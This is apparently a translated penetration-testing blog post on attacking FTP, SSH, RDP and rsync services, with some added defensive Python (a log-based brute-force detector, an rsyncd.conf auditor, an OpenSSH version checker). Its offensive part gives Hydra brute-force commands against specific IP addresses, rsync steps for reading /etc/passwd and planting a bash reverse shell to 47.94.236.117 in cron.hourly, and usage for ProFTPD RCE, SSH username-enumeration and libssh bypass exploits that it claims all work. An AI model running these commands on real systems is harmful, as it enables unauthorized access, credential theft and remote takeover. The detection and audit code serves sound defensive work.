Penetration Testing - Application Protocol Security Rsync&SSH&RDP&FTP

0x00 Introduction

In the information-gathering phase of a penetration test, port probing is a key point of attention: different ports correspond to services that speak different protocols. This post gives a brief summary of penetration testing against these common service ports.
Service ports I have seen:

0x01 Password brute-forcing - FTP, RDP, SSH

These three remote access and file transfer protocols, once their ports are found by a probe, can be tried for weak-password brute-forcing. The tool commonly used for this is Hydra.
Project address: https://github.com/vanhauser-thc/thc-hydra
Hydra supports weak-password brute-forcing over many protocols and is bundled with Kali.

hydra -l user -P passlist.txt ftp://192.168.0.1
hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN
hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5
hydra -l admin -p password ftp://[192.168.0.0/24]/
hydra -L logins.txt -P pws.txt -M targets.txt ssh
Brute-force examples:
hydra -L test -P 10top1K.txt 47.110.53.159 ftp -V
hydra -l root -P 10top1K.txt 47.110.53.159 ssh -V
hydra -l administrator -P 10top1K.txt 47.110.53.159 rdp -V
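From the defender's side, the brute-force runs above show up in sshd's auth log as a burst of "Failed password" lines from one source address, sometimes followed by an "Accepted" line if a guess landed. The following is an added example (not part of the original post) of a sliding-window detector over constructed sshd log lines; the threshold, the window length and the log year are assumptions, and the detector alerts once when a source crosses the failure threshold and again, at higher severity, if that source then logs in successfully while the window is still hot.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sshd log lines for the demo (not real traffic; 203.0.113.0/24 and
# 198.51.100.0/24 are documentation ranges).
SAMPLE_LOG = """\
Jan 10 12:00:01 web1 sshd[2101]: Failed password for invalid user admin from 203.0.113.9 port 51234 ssh2
Jan 10 12:00:02 web1 sshd[2102]: Failed password for root from 203.0.113.9 port 51236 ssh2
Jan 10 12:00:02 web1 sshd[2103]: Failed password for invalid user test from 203.0.113.9 port 51238 ssh2
Jan 10 12:00:03 web1 sshd[2104]: Failed password for root from 203.0.113.9 port 51240 ssh2
Jan 10 12:00:03 web1 sshd[2105]: Failed password for root from 203.0.113.9 port 51242 ssh2
Jan 10 12:00:04 web1 sshd[2106]: Accepted password for root from 203.0.113.9 port 51244 ssh2
Jan 10 12:05:00 web1 sshd[2107]: Failed password for alice from 198.51.100.4 port 40000 ssh2
Jan 10 12:05:30 web1 sshd[2108]: Accepted publickey for alice from 198.51.100.4 port 40002 ssh2
"""

# Matches the standard OpenSSH "Failed/Accepted <method> for [invalid user] <user> from <ip>" lines.
LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>\w+) for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+"
)


def parse_line(line, year=2024):
    """Return a dict for an auth-result line, or None for lines we do not care about.
    syslog timestamps carry no year, so one is assumed (labelled assumption)."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return {"ts": ts, "result": m["result"], "method": m["method"],
            "user": m["user"], "ip": m["ip"]}


def detect_bruteforce(log_text, threshold=5, window_seconds=60):
    """Sliding-window detector: alert when one source IP reaches `threshold`
    failed logins within `window_seconds`, and raise a higher-severity alert
    if that same IP then gets an Accepted login while the window is still hot."""
    events = [e for e in (parse_line(l) for l in log_text.splitlines()) if e]
    events.sort(key=lambda e: e["ts"])
    failures = defaultdict(list)  # ip -> timestamps of recent failures
    alerts = []
    for e in events:
        ip, ts = e["ip"], e["ts"]
        # Drop failures that fell out of the window before looking at this event.
        failures[ip] = [t for t in failures[ip] if (ts - t).total_seconds() <= window_seconds]
        if e["result"] == "Failed":
            failures[ip].append(ts)
            if len(failures[ip]) == threshold:  # fire once per burst, not on every extra failure
                alerts.append({"type": "bruteforce", "ip": ip, "ts": ts,
                               "failures": len(failures[ip])})
        elif len(failures[ip]) >= threshold:
            alerts.append({"type": "success_after_bruteforce", "ip": ip, "ts": ts,
                           "user": e["user"], "method": e["method"]})
    return alerts


if __name__ == "__main__":
    for a in detect_bruteforce(SAMPLE_LOG):
        print(a)
```

On the sample input the first alert fires on the fifth failure from 203.0.113.9 and the second on the "Accepted password for root" that follows it; the single failure from 198.51.100.4 never crosses the threshold, so the later key-based login there is not flagged.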

0x02 Unauthorized access due to improper configuration - Rsync

rsync is a commonly used Linux application for file synchronization. It can synchronize files between a local computer and a remote computer, or between two local directories (but does not support synchronization between two remote computers). It can also be used as a file copy tool, replacing the cp and mv commands.

By default it listens on port 873. If the target has not enabled an ACL or an access password, files on it can be read and written without any authorization.
Check (list the exported modules): rsync rsync://123.58.236.76:45854/

Exploitation:
- Read files: rsync rsync://123.58.236.76:45854/src/
- Download a file: rsync rsync://123.58.236.76:45854/src/etc/passwd ./
- Upload a file: rsync -av passwd rsync://123.58.236.76:45854/src/tmp/passwd
Reverse shell:
1. Gather information:
rsync rsync://123.58.236.76:12177/src/etc/crontab /root/cron.txt
2. Create the file:
touch shell
#!/bin/bash
/bin/bash -i >& /dev/tcp/47.94.236.117/5566 0>&1
chmod +x shell
3. Upload the file:
rsync -av shell rsync://123.58.236.76:12177/src/etc/cron.hourly
4. Wait for the reverse connection.

Batch verification of unauthorized Rsync access with msf and fofa
fofa collection tool: https://github.com/wgpsec/fofa_viewer
msf batch verification:

msfconsole
use auxiliary/scanner/rsync/modules_list
set rhosts file:/root/ips.txt
set threads 10
run
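Every step of the rsync abuse above depends on an rsyncd.conf module that exports a sensitive path with no "auth users", no "hosts allow", "read only = no" and no chroot. The following is an added example (not part of the original post or of rsync itself) that audits an rsyncd.conf for exactly those settings; the sample config is constructed, with a [src] module that mirrors the misconfiguration the post exploits next to a hardened [backup] module, and the defaults table follows the rsyncd.conf man page.

```python
import configparser

# Constructed rsyncd.conf for the demo (not from the original post): the [src]
# module mirrors the misconfiguration the post exploits, [backup] is the hardened form.
SAMPLE_RSYNCD_CONF = """\
uid = root
gid = root
use chroot = no
max connections = 4
pid file = /var/run/rsyncd.pid

[src]
path = /
comment = whole filesystem, anonymous read/write
read only = no

[backup]
path = /srv/backup
comment = hardened module
read only = yes
list = no
auth users = backup
secrets file = /etc/rsyncd.secrets
hosts allow = 10.0.0.0/24
hosts deny = *
"""

# rsyncd defaults that matter for exposure (from the rsyncd.conf man page).
DEFAULTS = {"read only": "yes", "list": "yes", "use chroot": "yes"}


def parse_rsyncd(text):
    """rsyncd.conf is INI-like, but global parameters precede the first [module];
    prepend a synthetic [global] header so configparser accepts them."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.read_string("[global]\n" + text)
    return cp


def _setting(cp, module, key):
    """Module value, else global value, else rsync's built-in default."""
    if key in cp[module]:
        return cp[module][key].strip()
    if key in cp["global"]:
        return cp["global"][key].strip()
    return DEFAULTS.get(key, "")


def _is_yes(value):
    return value.lower() in ("yes", "true", "1")


def audit_rsyncd(text):
    """Return {module: [issue, ...]} for every module in the config."""
    cp = parse_rsyncd(text)
    findings = {}
    for module in cp.sections():
        if module == "global":
            continue
        issues = []
        if not _setting(cp, module, "auth users"):
            issues.append("no 'auth users': module is reachable without a password")
        if not _setting(cp, module, "hosts allow"):
            issues.append("no 'hosts allow': module accepts connections from any address")
        if not _is_yes(_setting(cp, module, "read only")):
            issues.append("'read only = no': clients can upload files (e.g. into cron directories)")
        if _is_yes(_setting(cp, module, "list")):
            issues.append("'list = yes': module name is shown in anonymous 'rsync rsync://host/' listings")
        if _setting(cp, module, "path") == "/":
            issues.append("'path = /': module exposes the whole filesystem")
        if not _is_yes(_setting(cp, module, "use chroot")):
            issues.append("'use chroot = no': symlinks inside the module can escape its path")
        findings[module] = issues
    return findings


if __name__ == "__main__":
    for module, issues in audit_rsyncd(SAMPLE_RSYNCD_CONF).items():
        print(f"[{module}] {len(issues)} issue(s)")
        for i in issues:
            print("  -", i)
```

On the sample config [src] collects all six findings, while [backup] only inherits the global "use chroot = no"; fixing that one global line and keeping the [backup] pattern (auth users plus secrets file, hosts allow, read only, list = no) removes everything the msf module and the manual rsync:// checks above would find.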

0x03 RCE command execution - FTP, ProFTPD

Exploit used: https://github.com/t0kx/exploit-CVE-2015-3306

Usage (RCE):
python exploit.py --host xxx.xxx.xxx.xxx --port xxx --path "/var/www/html/"
http://xxx:xxx/backdoor.php?cmd=id

Exp source code:

0x04 SSH username enumeration - CVE-2018-15473

exp: https://github.com/Rhynorater/CVE-2018-15473-Exploit
Combining username enumeration with password brute-forcing greatly improves brute-force efficiency. Usage:

pip3 install -r requirements.txt
pip3 install paramiko==2.4.1
python sshUsernameEnumExploit.py --port 32013 --userList exampleInput.txt 123.58.236.76
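The quickest defensive check against the enumeration above is version inventory: CVE-2018-15473 affects OpenSSH through 7.7, and OpenSSH 7.8 changed the server to fully parse the authentication request before rejecting an invalid user, which removes the response difference the exploit relies on. The following is an added example (not part of the original post or of the exploit repository) that parses OpenSSH identification banners and triages them against that fixed version; the sample banners are constructed. One caveat a practitioner needs: Debian, Ubuntu and RHEL backport security fixes without bumping the upstream version string, so "likely-affected" here is a signal to confirm against the distribution's package changelog, not proof.

```python
import re
import socket

# CVE-2018-15473 (the enumeration the post's exploit uses) affects OpenSSH through 7.7;
# OpenSSH 7.8 parses the whole request before bailing out on an invalid user.
FIXED_VERSION = (7, 8)

BANNER_RE = re.compile(r"^SSH-(?P<proto>[\d.]+)-OpenSSH_(?P<major>\d+)\.(?P<minor>\d+)")

# Constructed sample banners (not captured from the hosts in the post).
SAMPLE_BANNERS = [
    "SSH-2.0-OpenSSH_7.4p1 Debian-10+deb9u7",
    "SSH-2.0-OpenSSH_7.9p1 Ubuntu-10",
    "SSH-2.0-OpenSSH_8.2",
    "SSH-2.0-dropbear_2019.78",
]


def parse_openssh_version(banner):
    """(major, minor) from an OpenSSH identification string, or None if it is
    not OpenSSH or the version has been hidden."""
    m = BANNER_RE.match(banner.strip())
    if not m:
        return None
    return int(m["major"]), int(m["minor"])


def assess_banner(banner):
    """Triage verdict from the banner alone. 'likely-affected' means 'check the
    distro package changelog': vendors backport fixes without changing the
    upstream version, so the banner can be older than the code behind it."""
    version = parse_openssh_version(banner)
    if version is None:
        return "unknown"
    return "likely-affected" if version < FIXED_VERSION else "not-affected-by-version"


def grab_banner(host, port=22, timeout=3.0):
    """Read the server identification line from one of your own hosts. The server
    sends it first, before key exchange, so no credentials or login attempt are involved."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        return s.recv(256).decode("ascii", "replace").splitlines()[0]


def assess_inventory(banners):
    """Map each banner to its verdict, e.g. for a list collected from an asset inventory."""
    return {b: assess_banner(b) for b in banners}


if __name__ == "__main__":
    for banner, verdict in assess_inventory(SAMPLE_BANNERS).items():
        print(f"{verdict:24} {banner}")
```

The non-OpenSSH banner is reported as "unknown" rather than "not affected" on purpose: a different implementation needs its own advisory lookup, and a server that hides its version string gives no evidence either way.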

0x05 SSH authentication bypass

exp: https://www.seebug.org/vuldb/ssvid-97614
exploit: python libssh.py IP port "id"

No screenshots are included for the exploits; readers can test them themselves. All of the exploits above were tested and work.


Source: blog.csdn.net/qq_53577336/article/details/124093079